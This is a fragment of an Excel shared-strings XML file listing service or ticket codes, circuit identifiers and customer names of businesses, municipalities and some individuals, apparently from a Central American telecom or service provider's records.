  <si>
    <t>F4621307</t>
  </si>
  <si>
    <t>F4621309</t>
  </si>
  <si>
    <t>F4621310</t>
  </si>
  <si>
    <t>22678000SV</t>
  </si>
  <si>
    <t>TACA INTERNATIONAL AIRLINES S.A.</t>
  </si>
  <si>
    <t>90001909369T</t>
  </si>
  <si>
    <t>1599288OH</t>
  </si>
  <si>
    <t>F4621323</t>
  </si>
  <si>
    <t>878400001T</t>
  </si>
  <si>
    <t>INGENIO SANTA ANA.</t>
  </si>
  <si>
    <t>F4621333</t>
  </si>
  <si>
    <t>F4621335</t>
  </si>
  <si>
    <t>245700167T</t>
  </si>
  <si>
    <t>ID1030027SV</t>
  </si>
  <si>
    <t>E SMART SA DE CV</t>
  </si>
  <si>
    <t>IDG002402SV</t>
  </si>
  <si>
    <t>F4621353</t>
  </si>
  <si>
    <t>F4621360</t>
  </si>
  <si>
    <t>47501476T</t>
  </si>
  <si>
    <t>ID1287002SV</t>
  </si>
  <si>
    <t>ZAMORANO GROUP SA DE CV</t>
  </si>
  <si>
    <t>F4621365</t>
  </si>
  <si>
    <t>F4621372</t>
  </si>
  <si>
    <t>F4621373</t>
  </si>
  <si>
    <t>F4621376</t>
  </si>
  <si>
    <t>F4621381</t>
  </si>
  <si>
    <t>F4621384</t>
  </si>
  <si>
    <t>F4621386</t>
  </si>
  <si>
    <t>22095400SV</t>
  </si>
  <si>
    <t>EURO SALVADORENA</t>
  </si>
  <si>
    <t>IP2067011SV</t>
  </si>
  <si>
    <t>F4621397</t>
  </si>
  <si>
    <t>8000039T</t>
  </si>
  <si>
    <t>ID1029397SV</t>
  </si>
  <si>
    <t>FUNDACION PANAMERICANA PARA EL DESARROLLO</t>
  </si>
  <si>
    <t>3267063ON</t>
  </si>
  <si>
    <t>42700436T</t>
  </si>
  <si>
    <t>F4558697</t>
  </si>
  <si>
    <t>F4558702</t>
  </si>
  <si>
    <t>F4558705</t>
  </si>
  <si>
    <t>F4558709</t>
  </si>
  <si>
    <t>F4558715</t>
  </si>
  <si>
    <t>F4558717</t>
  </si>
  <si>
    <t>518961OH</t>
  </si>
  <si>
    <t>F4558728</t>
  </si>
  <si>
    <t>F4558739</t>
  </si>
  <si>
    <t>F4558751</t>
  </si>
  <si>
    <t>F4558756</t>
  </si>
  <si>
    <t>F4558757</t>
  </si>
  <si>
    <t>17400240T</t>
  </si>
  <si>
    <t>F4558761</t>
  </si>
  <si>
    <t>8200204T</t>
  </si>
  <si>
    <t>F4558762</t>
  </si>
  <si>
    <t>F4558763</t>
  </si>
  <si>
    <t>F4558765</t>
  </si>
  <si>
    <t>F4558770</t>
  </si>
  <si>
    <t>F4558776</t>
  </si>
  <si>
    <t>F4558779</t>
  </si>
  <si>
    <t>F4558780</t>
  </si>
  <si>
    <t>F4558782</t>
  </si>
  <si>
    <t>F4558785</t>
  </si>
  <si>
    <t>F4558788</t>
  </si>
  <si>
    <t>F4558798</t>
  </si>
  <si>
    <t>90001801354T</t>
  </si>
  <si>
    <t>F4558825</t>
  </si>
  <si>
    <t>F4592185</t>
  </si>
  <si>
    <t>F4592191</t>
  </si>
  <si>
    <t>F4592205</t>
  </si>
  <si>
    <t>F4592209</t>
  </si>
  <si>
    <t>F4592212</t>
  </si>
  <si>
    <t>F4592216</t>
  </si>
  <si>
    <t>CC_BANRURAL_GT_AGENCIA_0870</t>
  </si>
  <si>
    <t>F4592218</t>
  </si>
  <si>
    <t>F4592220</t>
  </si>
  <si>
    <t>F4592226</t>
  </si>
  <si>
    <t>90001908230T</t>
  </si>
  <si>
    <t>F4592239</t>
  </si>
  <si>
    <t>CC_WALMART_GT_TIENDA_4263</t>
  </si>
  <si>
    <t>628716OH</t>
  </si>
  <si>
    <t>297400924T</t>
  </si>
  <si>
    <t>F4592264</t>
  </si>
  <si>
    <t>F4592268</t>
  </si>
  <si>
    <t>F4592301</t>
  </si>
  <si>
    <t>F4592302</t>
  </si>
  <si>
    <t>F4592321</t>
  </si>
  <si>
    <t>F4592331</t>
  </si>
  <si>
    <t>F4592337</t>
  </si>
  <si>
    <t>F4605571</t>
  </si>
  <si>
    <t>F4605575</t>
  </si>
  <si>
    <t>F4605597</t>
  </si>
  <si>
    <t>938000001T</t>
  </si>
  <si>
    <t>UNIVERSIDAD REGIONAL DE GUATEMALA</t>
  </si>
  <si>
    <t>F4605605</t>
  </si>
  <si>
    <t>F4605612</t>
  </si>
  <si>
    <t>CC_IJSUD_GT_CERINAL_CUILAPA</t>
  </si>
  <si>
    <t>F4605616</t>
  </si>
  <si>
    <t>F4605636</t>
  </si>
  <si>
    <t>F4605647</t>
  </si>
  <si>
    <t>871300001T</t>
  </si>
  <si>
    <t>FANNY'S EXPRESS, S.A.</t>
  </si>
  <si>
    <t>F4605664</t>
  </si>
  <si>
    <t>F4605677</t>
  </si>
  <si>
    <t>F4605680</t>
  </si>
  <si>
    <t>F4605684</t>
  </si>
  <si>
    <t>47504271T</t>
  </si>
  <si>
    <t>CC_GYT_GT_AGENCIA_163</t>
  </si>
  <si>
    <t>F4605691</t>
  </si>
  <si>
    <t>F4605692</t>
  </si>
  <si>
    <t>516700007T</t>
  </si>
  <si>
    <t>90001902844T</t>
  </si>
  <si>
    <t>F4605724</t>
  </si>
  <si>
    <t>F4605726</t>
  </si>
  <si>
    <t>1731978OH</t>
  </si>
  <si>
    <t>F4579413</t>
  </si>
  <si>
    <t>861074OH</t>
  </si>
  <si>
    <t>F4579428</t>
  </si>
  <si>
    <t>F4579433</t>
  </si>
  <si>
    <t>607850ON</t>
  </si>
  <si>
    <t>F4579447</t>
  </si>
  <si>
    <t>CC_AZTECA_GT_SUC007830</t>
  </si>
  <si>
    <t>F4579454</t>
  </si>
  <si>
    <t>F4579471</t>
  </si>
  <si>
    <t>F4579485</t>
  </si>
  <si>
    <t>47501158T</t>
  </si>
  <si>
    <t>47503796T</t>
  </si>
  <si>
    <t>F4579528</t>
  </si>
  <si>
    <t>ID1041016SV</t>
  </si>
  <si>
    <t>INDUSTRIAS UNIDASS.A</t>
  </si>
  <si>
    <t>678000012T</t>
  </si>
  <si>
    <t>47501774T</t>
  </si>
  <si>
    <t>F4579542</t>
  </si>
  <si>
    <t>F4579544</t>
  </si>
  <si>
    <t>F4579545</t>
  </si>
  <si>
    <t>F4579546</t>
  </si>
  <si>
    <t>F4579549</t>
  </si>
  <si>
    <t>F4579550</t>
  </si>
  <si>
    <t>23222800SV</t>
  </si>
  <si>
    <t>1623491OH</t>
  </si>
  <si>
    <t>F4598580</t>
  </si>
  <si>
    <t>F4598598</t>
  </si>
  <si>
    <t>F4598610</t>
  </si>
  <si>
    <t>F4598613</t>
  </si>
  <si>
    <t>CONTR0001451708OC</t>
  </si>
  <si>
    <t>CC_WALMART_CR_TIENDA_4432</t>
  </si>
  <si>
    <t>F4598690</t>
  </si>
  <si>
    <t>F4598715</t>
  </si>
  <si>
    <t>CONTR0001888650OC</t>
  </si>
  <si>
    <t>F4609970</t>
  </si>
  <si>
    <t>F4609973</t>
  </si>
  <si>
    <t>CC_CAMPERO_GT_INTERNET_C704</t>
  </si>
  <si>
    <t>506401ON</t>
  </si>
  <si>
    <t>F4548213</t>
  </si>
  <si>
    <t>F4548214</t>
  </si>
  <si>
    <t>47502499T</t>
  </si>
  <si>
    <t>F4548249</t>
  </si>
  <si>
    <t>F4548252</t>
  </si>
  <si>
    <t>F4548259</t>
  </si>
  <si>
    <t>F4548266</t>
  </si>
  <si>
    <t>514300017T</t>
  </si>
  <si>
    <t>F4548280</t>
  </si>
  <si>
    <t>F4548281</t>
  </si>
  <si>
    <t>F4548296</t>
  </si>
  <si>
    <t>F4548308</t>
  </si>
  <si>
    <t>F4548313</t>
  </si>
  <si>
    <t>F4548314</t>
  </si>
  <si>
    <t>F4548316</t>
  </si>
  <si>
    <t>F4587242</t>
  </si>
  <si>
    <t>F4587245</t>
  </si>
  <si>
    <t>F4587256</t>
  </si>
  <si>
    <t>F4587268</t>
  </si>
  <si>
    <t>758500171T</t>
  </si>
  <si>
    <t>IP2393002SV</t>
  </si>
  <si>
    <t>F4587274</t>
  </si>
  <si>
    <t>25230500SV</t>
  </si>
  <si>
    <t>INSTITUTO SALVADORENO DE CONTADORES PUBLICOS</t>
  </si>
  <si>
    <t>F4587277</t>
  </si>
  <si>
    <t>F4587279</t>
  </si>
  <si>
    <t>F4587281</t>
  </si>
  <si>
    <t>941700001T</t>
  </si>
  <si>
    <t>CENTRAL DE RADIO, S.A.</t>
  </si>
  <si>
    <t>F4587291</t>
  </si>
  <si>
    <t>F4587297</t>
  </si>
  <si>
    <t>758500490T</t>
  </si>
  <si>
    <t>758500488T</t>
  </si>
  <si>
    <t>910400028T</t>
  </si>
  <si>
    <t>22252789SV</t>
  </si>
  <si>
    <t>ASOCIACION RED DE CONTADORES  DE EL SAVADOR</t>
  </si>
  <si>
    <t>1413519OH</t>
  </si>
  <si>
    <t>SEVENDR</t>
  </si>
  <si>
    <t>F4587332</t>
  </si>
  <si>
    <t>F4587333</t>
  </si>
  <si>
    <t>ID1282003SV</t>
  </si>
  <si>
    <t>F4587341</t>
  </si>
  <si>
    <t>F4587346</t>
  </si>
  <si>
    <t>F4587348</t>
  </si>
  <si>
    <t>ID1036059SV</t>
  </si>
  <si>
    <t>SERVICIOS TECNICOS SVP S.A. DE C.V.</t>
  </si>
  <si>
    <t>F4587366</t>
  </si>
  <si>
    <t>297401548T</t>
  </si>
  <si>
    <t>90001909170T</t>
  </si>
  <si>
    <t>F4587373</t>
  </si>
  <si>
    <t>F4587375</t>
  </si>
  <si>
    <t>F4587376</t>
  </si>
  <si>
    <t>F4587377</t>
  </si>
  <si>
    <t>F4587378</t>
  </si>
  <si>
    <t>F4587384</t>
  </si>
  <si>
    <t>F4587389</t>
  </si>
  <si>
    <t>F4614696</t>
  </si>
  <si>
    <t>CC_WALMART_UTILITARIOS_GT_84</t>
  </si>
  <si>
    <t>F4614699</t>
  </si>
  <si>
    <t>CC_WALMART_CR_TIENDA_JIMENEZ</t>
  </si>
  <si>
    <t>F4614704</t>
  </si>
  <si>
    <t>344400576T</t>
  </si>
  <si>
    <t>F4614715</t>
  </si>
  <si>
    <t>F4614717</t>
  </si>
  <si>
    <t>F4614718</t>
  </si>
  <si>
    <t>F4614720</t>
  </si>
  <si>
    <t>90001801125T</t>
  </si>
  <si>
    <t>F4614750</t>
  </si>
  <si>
    <t>IP2147030SV</t>
  </si>
  <si>
    <t>F4614811</t>
  </si>
  <si>
    <t>CONTR0002190923OC</t>
  </si>
  <si>
    <t>GANO ITOUCH CR SA</t>
  </si>
  <si>
    <t>F4620256</t>
  </si>
  <si>
    <t>F4620263</t>
  </si>
  <si>
    <t>F4620266</t>
  </si>
  <si>
    <t>FH3032</t>
  </si>
  <si>
    <t>IP2037312SV</t>
  </si>
  <si>
    <t>F4620298</t>
  </si>
  <si>
    <t>85700030T</t>
  </si>
  <si>
    <t>F4620305</t>
  </si>
  <si>
    <t>F4620323</t>
  </si>
  <si>
    <t>F4620325</t>
  </si>
  <si>
    <t>F4620328</t>
  </si>
  <si>
    <t>CC_BANCO_AZTECA_SV_CIUDAD_ARCE</t>
  </si>
  <si>
    <t>F4620329</t>
  </si>
  <si>
    <t>F4620330</t>
  </si>
  <si>
    <t>F4620331</t>
  </si>
  <si>
    <t>47503019T</t>
  </si>
  <si>
    <t>F4620342</t>
  </si>
  <si>
    <t>F4620348</t>
  </si>
  <si>
    <t>F4620352</t>
  </si>
  <si>
    <t>F4620363</t>
  </si>
  <si>
    <t>CC_BANRURAL_GT_AGENCIA_0153</t>
  </si>
  <si>
    <t>F4620372</t>
  </si>
  <si>
    <t>F4620380</t>
  </si>
  <si>
    <t>1260096OH</t>
  </si>
  <si>
    <t>GRUPO UMA</t>
  </si>
  <si>
    <t>F4620394</t>
  </si>
  <si>
    <t>F4621419</t>
  </si>
  <si>
    <t>296800014T</t>
  </si>
  <si>
    <t>935600001T</t>
  </si>
  <si>
    <t>SILVIA NOEMI HIDALGO SANTIZO.</t>
  </si>
  <si>
    <t>F4621422</t>
  </si>
  <si>
    <t>866900001T</t>
  </si>
  <si>
    <t>COOPERATIVA INTEGRAL DE AHORRO Y CREDITO SAN JERONIMO, R.L.</t>
  </si>
  <si>
    <t>90001911216T</t>
  </si>
  <si>
    <t>F4621447</t>
  </si>
  <si>
    <t>541900001T</t>
  </si>
  <si>
    <t>HOSPITAL PRIVADO QUETZALTENANGO</t>
  </si>
  <si>
    <t>F4621469</t>
  </si>
  <si>
    <t>ID1383078SV</t>
  </si>
  <si>
    <t>ALCALDIA MUNICIPAL DE SAN JUAN OPICO</t>
  </si>
  <si>
    <t>F4621475</t>
  </si>
  <si>
    <t>F4621479</t>
  </si>
  <si>
    <t>IDG000608SV</t>
  </si>
  <si>
    <t>8200108T</t>
  </si>
  <si>
    <t>F4621485</t>
  </si>
  <si>
    <t>F4621494</t>
  </si>
  <si>
    <t>F4621501</t>
  </si>
  <si>
    <t>938186OH</t>
  </si>
  <si>
    <t>F4621504</t>
  </si>
  <si>
    <t>CC_IJSUD_GT_TAXISCO</t>
  </si>
  <si>
    <t>563600001T</t>
  </si>
  <si>
    <t>INVERSIONES MASDEL, SOCIEDAD ANONIMA</t>
  </si>
  <si>
    <t>F4621512</t>
  </si>
  <si>
    <t>F4621513</t>
  </si>
  <si>
    <t>938681OH</t>
  </si>
  <si>
    <t>3581849ON</t>
  </si>
  <si>
    <t>22136200SV</t>
  </si>
  <si>
    <t>JANICE GEORGINA VENTURA DE GARCIA</t>
  </si>
  <si>
    <t>F4621523</t>
  </si>
  <si>
    <t>620200001T</t>
  </si>
  <si>
    <t>POWER QUALITY SERVICES, S.A.</t>
  </si>
  <si>
    <t>F4621532</t>
  </si>
  <si>
    <t>F4621533</t>
  </si>
  <si>
    <t>284500070T</t>
  </si>
  <si>
    <t>846800001T</t>
  </si>
  <si>
    <t>COMERCIAL MAYORISTA, S.A</t>
  </si>
  <si>
    <t>1307063OH</t>
  </si>
  <si>
    <t>COMUNICACION Y TECNOLOGIA CACERES</t>
  </si>
  <si>
    <t>F4621547</t>
  </si>
  <si>
    <t>5033945ON</t>
  </si>
  <si>
    <t>CC_MAGDALENA_CAYALA_VISTA_HERMOSA_GT_CENTRAL</t>
  </si>
  <si>
    <t>F4621555</t>
  </si>
  <si>
    <t>CC_IMSA_GT_INTERNET_Z15</t>
  </si>
  <si>
    <t>1021140OH</t>
  </si>
  <si>
    <t>F4559759</t>
  </si>
  <si>
    <t>IP2276047SV</t>
  </si>
  <si>
    <t>F4559770</t>
  </si>
  <si>
    <t>F4559779</t>
  </si>
  <si>
    <t>F4559789</t>
  </si>
  <si>
    <t>F4559790</t>
  </si>
  <si>
    <t>F4559791</t>
  </si>
  <si>
    <t>F4559796</t>
  </si>
  <si>
    <t>F4559803</t>
  </si>
  <si>
    <t>22416100SV</t>
  </si>
  <si>
    <t>VIVA OUTDOOR S.A. DE C.V.</t>
  </si>
  <si>
    <t>29500009T</t>
  </si>
  <si>
    <t>F4559830</t>
  </si>
  <si>
    <t>CONTR0001034459OC</t>
  </si>
  <si>
    <t>MUNICIPALIDAD DE ALAJUELITA</t>
  </si>
  <si>
    <t>858389OH</t>
  </si>
  <si>
    <t>OH1000014253/ALCANCE  -</t>
  </si>
  <si>
    <t>IDG000539SV</t>
  </si>
  <si>
    <t>SERVICES AND REPRESENTATIONS SA DE CV</t>
  </si>
  <si>
    <t>F4559835</t>
  </si>
  <si>
    <t>758500136T</t>
  </si>
  <si>
    <t>F4559841</t>
  </si>
  <si>
    <t>F4559843</t>
  </si>
  <si>
    <t>F4559852</t>
  </si>
  <si>
    <t>F4559862</t>
  </si>
  <si>
    <t>CC_CALLEJA_SV_T_49</t>
  </si>
  <si>
    <t>F4559863</t>
  </si>
  <si>
    <t>1729727OH</t>
  </si>
  <si>
    <t>OH1000516351/SECRETARIA DE FINANZAS -</t>
  </si>
  <si>
    <t>F4559870</t>
  </si>
  <si>
    <t>4629190ON</t>
  </si>
  <si>
    <t>807900369T</t>
  </si>
  <si>
    <t>CC_TYT_GT_ATM0556</t>
  </si>
  <si>
    <t>807900368T</t>
  </si>
  <si>
    <t>841400024T</t>
  </si>
  <si>
    <t>90001909439T</t>
  </si>
  <si>
    <t>25269000SV</t>
  </si>
  <si>
    <t>DEFENSORIA DEL CONSUMIDOR</t>
  </si>
  <si>
    <t>IP2306001SV</t>
  </si>
  <si>
    <t>829800056T</t>
  </si>
  <si>
    <t>22502000SV</t>
  </si>
  <si>
    <t>UNION COMERCIAL CORPORATIVO S.A. DE C.V.</t>
  </si>
  <si>
    <t>IP2148149SV</t>
  </si>
  <si>
    <t>ALCALDIA MUNICIPAL DE CONCHAGUA</t>
  </si>
  <si>
    <t>F4592994</t>
  </si>
  <si>
    <t>F4593005</t>
  </si>
  <si>
    <t>277800015T</t>
  </si>
  <si>
    <t>606900013T</t>
  </si>
  <si>
    <t>F4593020</t>
  </si>
  <si>
    <t>F4593021</t>
  </si>
  <si>
    <t>F4593023</t>
  </si>
  <si>
    <t>25244300SV</t>
  </si>
  <si>
    <t>SEFLOT S.A DE C.V.</t>
  </si>
  <si>
    <t>F4593036</t>
  </si>
  <si>
    <t>921500009T</t>
  </si>
  <si>
    <t>770600098T</t>
  </si>
  <si>
    <t>349900322T</t>
  </si>
  <si>
    <t>F4593050</t>
  </si>
  <si>
    <t>492600004T</t>
  </si>
  <si>
    <t>DELLARE S.A.</t>
  </si>
  <si>
    <t>632100002T</t>
  </si>
  <si>
    <t>BANCO PROMERICA SOCIEDAD ANONIMA (XT)</t>
  </si>
  <si>
    <t>427100083T</t>
  </si>
  <si>
    <t>F4593062</t>
  </si>
  <si>
    <t>863400149T</t>
  </si>
  <si>
    <t>F4593077</t>
  </si>
  <si>
    <t>F4593082</t>
  </si>
  <si>
    <t>F4593083</t>
  </si>
  <si>
    <t>921500017T</t>
  </si>
  <si>
    <t>F4593092</t>
  </si>
  <si>
    <t>F4593099</t>
  </si>
  <si>
    <t>F4593101</t>
  </si>
  <si>
    <t>598600001T</t>
  </si>
  <si>
    <t>ARANA CARRILLO SERVICIOS DE VIGILANCIA PROFESIONAL S.A.</t>
  </si>
  <si>
    <t>F4593107</t>
  </si>
  <si>
    <t>47503075T</t>
  </si>
  <si>
    <t>F4593108</t>
  </si>
  <si>
    <t>406400037T</t>
  </si>
  <si>
    <t>F4593112</t>
  </si>
  <si>
    <t>349400118T</t>
  </si>
  <si>
    <t>F4593113</t>
  </si>
  <si>
    <t>IDG000049SV</t>
  </si>
  <si>
    <t>F4593117</t>
  </si>
  <si>
    <t>F4593118</t>
  </si>
  <si>
    <t>7900285T</t>
  </si>
  <si>
    <t>F4545166</t>
  </si>
  <si>
    <t>IP2124114SV</t>
  </si>
  <si>
    <t>F4580284</t>
  </si>
  <si>
    <t>8902263T</t>
  </si>
  <si>
    <t>F4580299</t>
  </si>
  <si>
    <t>576800001T</t>
  </si>
  <si>
    <t>PAN-AMERICAN LIFE INSURANCE DE GUATEMALA COMPAÑIA DE SEGUROS, S.A.</t>
  </si>
  <si>
    <t>666300004T</t>
  </si>
  <si>
    <t>CENTRO DISTRIBUIDOR, S.A.</t>
  </si>
  <si>
    <t>F4580315</t>
  </si>
  <si>
    <t>F4580323</t>
  </si>
  <si>
    <t>F4580342</t>
  </si>
  <si>
    <t>F4580346</t>
  </si>
  <si>
    <t>F4580366</t>
  </si>
  <si>
    <t>23091400SV</t>
  </si>
  <si>
    <t>F4580374</t>
  </si>
  <si>
    <t>535200128T</t>
  </si>
  <si>
    <t>47501923T</t>
  </si>
  <si>
    <t>535200129T</t>
  </si>
  <si>
    <t>IP2046072SV</t>
  </si>
  <si>
    <t>F4580391</t>
  </si>
  <si>
    <t>IP2041071SV</t>
  </si>
  <si>
    <t>F4580394</t>
  </si>
  <si>
    <t>F4580395</t>
  </si>
  <si>
    <t>237400018T</t>
  </si>
  <si>
    <t>ID1165114SV</t>
  </si>
  <si>
    <t>MURILLO GRANIELLO RAUL ESTEFANO</t>
  </si>
  <si>
    <t>IP2041048SV</t>
  </si>
  <si>
    <t>IP2223009SV</t>
  </si>
  <si>
    <t>F4580407</t>
  </si>
  <si>
    <t>F4580413</t>
  </si>
  <si>
    <t>IP2029319SV</t>
  </si>
  <si>
    <t>IP2031311SV</t>
  </si>
  <si>
    <t>F4580428</t>
  </si>
  <si>
    <t>ID1099135SV</t>
  </si>
  <si>
    <t>JOSE ELIAS POCASANGRE ESCOBAR</t>
  </si>
  <si>
    <t>21500016T</t>
  </si>
  <si>
    <t>F4598897</t>
  </si>
  <si>
    <t>F4598898</t>
  </si>
  <si>
    <t>CC_CERVECERIA_GT_AGENCIA_GLESA_ZONA_1</t>
  </si>
  <si>
    <t>F4598933</t>
  </si>
  <si>
    <t>F4598948</t>
  </si>
  <si>
    <t>F4598958</t>
  </si>
  <si>
    <t>F4598959</t>
  </si>
  <si>
    <t>F4598962</t>
  </si>
  <si>
    <t>F4598965</t>
  </si>
  <si>
    <t>678200001T</t>
  </si>
  <si>
    <t>CONTROLES GERENCIALES, S.A.</t>
  </si>
  <si>
    <t>F4598966</t>
  </si>
  <si>
    <t>F4598970</t>
  </si>
  <si>
    <t>IPG000106SV</t>
  </si>
  <si>
    <t>GERENCIA DE RECURSOS HUMANOS</t>
  </si>
  <si>
    <t>F4598975</t>
  </si>
  <si>
    <t>F4598977</t>
  </si>
  <si>
    <t>4095665ON</t>
  </si>
  <si>
    <t>427100090T</t>
  </si>
  <si>
    <t>F4599018</t>
  </si>
  <si>
    <t>90001906787T</t>
  </si>
  <si>
    <t>F4599033</t>
  </si>
  <si>
    <t>594555OH</t>
  </si>
  <si>
    <t>F4548563</t>
  </si>
  <si>
    <t>F4548631</t>
  </si>
  <si>
    <t>F4548643</t>
  </si>
  <si>
    <t>425500052T</t>
  </si>
  <si>
    <t>F4548657</t>
  </si>
  <si>
    <t>F4548661</t>
  </si>
  <si>
    <t>F4548666</t>
  </si>
  <si>
    <t>90001910704T</t>
  </si>
  <si>
    <t>F4548672</t>
  </si>
  <si>
    <t>F4548674</t>
  </si>
  <si>
    <t>IDG000612SV</t>
  </si>
  <si>
    <t>GUTICIA DE EL SALVADOR, S.A. DE C.V.</t>
  </si>
  <si>
    <t>F4548681</t>
  </si>
  <si>
    <t>F4548684</t>
  </si>
  <si>
    <t>F4548685</t>
  </si>
  <si>
    <t>90001905387T</t>
  </si>
  <si>
    <t>F4548689</t>
  </si>
  <si>
    <t>F4548692</t>
  </si>
  <si>
    <t>F4548693</t>
  </si>
  <si>
    <t>F4548694</t>
  </si>
  <si>
    <t>CC_TYT_GT_ATM0852</t>
  </si>
  <si>
    <t>F4548704</t>
  </si>
  <si>
    <t>F4548706</t>
  </si>
  <si>
    <t>820600002T</t>
  </si>
  <si>
    <t>COMBUSTIBLES DEL PAIS, S.A.</t>
  </si>
  <si>
    <t>22686400SV</t>
  </si>
  <si>
    <t>F4548720</t>
  </si>
  <si>
    <t>F4548726</t>
  </si>
  <si>
    <t>451942ON</t>
  </si>
  <si>
    <t>F4588014</t>
  </si>
  <si>
    <t>F4588015</t>
  </si>
  <si>
    <t>F4588016</t>
  </si>
  <si>
    <t>F4588030</t>
  </si>
  <si>
    <t>90001908778T</t>
  </si>
  <si>
    <t>F4588039</t>
  </si>
  <si>
    <t>3265174ON</t>
  </si>
  <si>
    <t>F4588042</t>
  </si>
  <si>
    <t>3277517ON</t>
  </si>
  <si>
    <t>F4588056</t>
  </si>
  <si>
    <t>F4588057</t>
  </si>
  <si>
    <t>562400001T</t>
  </si>
  <si>
    <t>DENTAL DESIGN, S.A.</t>
  </si>
  <si>
    <t>IP2385001SV</t>
  </si>
  <si>
    <t>F4588071</t>
  </si>
  <si>
    <t>CC_CALLEJA_SV_SALA229</t>
  </si>
  <si>
    <t>F4588074</t>
  </si>
  <si>
    <t>F4588080</t>
  </si>
  <si>
    <t>F4588101</t>
  </si>
  <si>
    <t>625900161T</t>
  </si>
  <si>
    <t>F4588108</t>
  </si>
  <si>
    <t>F4588110</t>
  </si>
  <si>
    <t>F4588112</t>
  </si>
  <si>
    <t>IP2145216SV</t>
  </si>
  <si>
    <t>F4588119</t>
  </si>
  <si>
    <t>47502526T</t>
  </si>
  <si>
    <t>F4588129</t>
  </si>
  <si>
    <t>8902637T</t>
  </si>
  <si>
    <t>F4588144</t>
  </si>
  <si>
    <t>F4588155</t>
  </si>
  <si>
    <t>297401335T</t>
  </si>
  <si>
    <t>F4588159</t>
  </si>
  <si>
    <t>F4588161</t>
  </si>
  <si>
    <t>F4588167</t>
  </si>
  <si>
    <t>22509200SV</t>
  </si>
  <si>
    <t>YSKL LA ROMANTICA S.A.</t>
  </si>
  <si>
    <t>F4615092</t>
  </si>
  <si>
    <t>F4615100</t>
  </si>
  <si>
    <t>F4615101</t>
  </si>
  <si>
    <t>F4615102</t>
  </si>
  <si>
    <t>F4615114</t>
  </si>
  <si>
    <t>F4615115</t>
  </si>
  <si>
    <t>IP2165196SV</t>
  </si>
  <si>
    <t>F4615120</t>
  </si>
  <si>
    <t>F4615137</t>
  </si>
  <si>
    <t>4982830ON</t>
  </si>
  <si>
    <t>TELMEX DEUTSCHE.</t>
  </si>
  <si>
    <t>F4615149</t>
  </si>
  <si>
    <t>F4615152</t>
  </si>
  <si>
    <t>ID1148060SV</t>
  </si>
  <si>
    <t xml:space="preserve">MINISTERIO DE DEFENSA CETAC										</t>
  </si>
  <si>
    <t>452200003T</t>
  </si>
  <si>
    <t>ASIAN TROPICS S.A.</t>
  </si>
  <si>
    <t>897800001T</t>
  </si>
  <si>
    <t>INMOBILIARIA SANTA LUGARDA, S.A.</t>
  </si>
  <si>
    <t>F4615187</t>
  </si>
  <si>
    <t>F4615189</t>
  </si>
  <si>
    <t>237400214T</t>
  </si>
  <si>
    <t>F4561812</t>
  </si>
  <si>
    <t>F4561825</t>
  </si>
  <si>
    <t>F4561861</t>
  </si>
  <si>
    <t>F4561865</t>
  </si>
  <si>
    <t>F4561867</t>
  </si>
  <si>
    <t>F4561872</t>
  </si>
  <si>
    <t>F4561875</t>
  </si>
  <si>
    <t>F4561876</t>
  </si>
  <si>
    <t>F4561880</t>
  </si>
  <si>
    <t>F4561887</t>
  </si>
  <si>
    <t>F4561936</t>
  </si>
  <si>
    <t>F4623337</t>
  </si>
  <si>
    <t>F4623352</t>
  </si>
  <si>
    <t>F4623390</t>
  </si>
  <si>
    <t>F4623392</t>
  </si>
  <si>
    <t>FH3340</t>
  </si>
  <si>
    <t>F4623393</t>
  </si>
  <si>
    <t>1751445OH</t>
  </si>
  <si>
    <t>F4623408</t>
  </si>
  <si>
    <t>F4623453</t>
  </si>
  <si>
    <t>47502914T</t>
  </si>
  <si>
    <t>F4623454</t>
  </si>
  <si>
    <t>90001908462T</t>
  </si>
  <si>
    <t>F4623476</t>
  </si>
  <si>
    <t>F4622188</t>
  </si>
  <si>
    <t>F4622200</t>
  </si>
  <si>
    <t>47503098T</t>
  </si>
  <si>
    <t>CC_GMG_GT_INTERNET_Z9</t>
  </si>
  <si>
    <t>20587677</t>
  </si>
  <si>
    <t>F4622253</t>
  </si>
  <si>
    <t>F4622254</t>
  </si>
  <si>
    <t>F4622324</t>
  </si>
  <si>
    <t>CC_BANTRAB_GT_CENTRAL_AZURE_DALLAS</t>
  </si>
  <si>
    <t>8902549T</t>
  </si>
  <si>
    <t>F4550026</t>
  </si>
  <si>
    <t>F4550030</t>
  </si>
  <si>
    <t>F4550038</t>
  </si>
  <si>
    <t>F4550039</t>
  </si>
  <si>
    <t>F4550040</t>
  </si>
  <si>
    <t>90001904765T</t>
  </si>
  <si>
    <t>664500010T</t>
  </si>
  <si>
    <t>CENTRAL DE FRICCIONES Y CLUTCHES, S.A.</t>
  </si>
  <si>
    <t>F4550087</t>
  </si>
  <si>
    <t>1422850OH</t>
  </si>
  <si>
    <t>1423647OH</t>
  </si>
  <si>
    <t>F4550095</t>
  </si>
  <si>
    <t>1439088OH</t>
  </si>
  <si>
    <t>F4550099</t>
  </si>
  <si>
    <t>F4550101</t>
  </si>
  <si>
    <t>F4550102</t>
  </si>
  <si>
    <t>F4550103</t>
  </si>
  <si>
    <t>F4550104</t>
  </si>
  <si>
    <t>F4550107</t>
  </si>
  <si>
    <t>F4550110</t>
  </si>
  <si>
    <t>297400131T</t>
  </si>
  <si>
    <t>90001801205T</t>
  </si>
  <si>
    <t>F4550122</t>
  </si>
  <si>
    <t>CC_FUNDGENESIS_GT_GUASTATOYA_026</t>
  </si>
  <si>
    <t>822666OH</t>
  </si>
  <si>
    <t>OH1000703052/COLEGIO PROFESIONAL SUPERIOR MAGISTRAL HONDUREÑO -</t>
  </si>
  <si>
    <t>733666OH</t>
  </si>
  <si>
    <t>OH1000647019/EMBAJADA DE EL SALVADOR -</t>
  </si>
  <si>
    <t>F4550158</t>
  </si>
  <si>
    <t>F4550163</t>
  </si>
  <si>
    <t>F4550168</t>
  </si>
  <si>
    <t>90001909897T</t>
  </si>
  <si>
    <t>297401031T</t>
  </si>
  <si>
    <t>F4565500</t>
  </si>
  <si>
    <t>CC_DISTELSA_GT_ZONA1_XELA</t>
  </si>
  <si>
    <t>F4565501</t>
  </si>
  <si>
    <t>F4565502</t>
  </si>
  <si>
    <t>F4565503</t>
  </si>
  <si>
    <t>F4565504</t>
  </si>
  <si>
    <t>F4565505</t>
  </si>
  <si>
    <t>F4565507</t>
  </si>
  <si>
    <t>F4565508</t>
  </si>
  <si>
    <t>F4565509</t>
  </si>
  <si>
    <t>F4565510</t>
  </si>
  <si>
    <t>F4565511</t>
  </si>
  <si>
    <t>F4565512</t>
  </si>
  <si>
    <t>F4565513</t>
  </si>
  <si>
    <t>F4565514</t>
  </si>
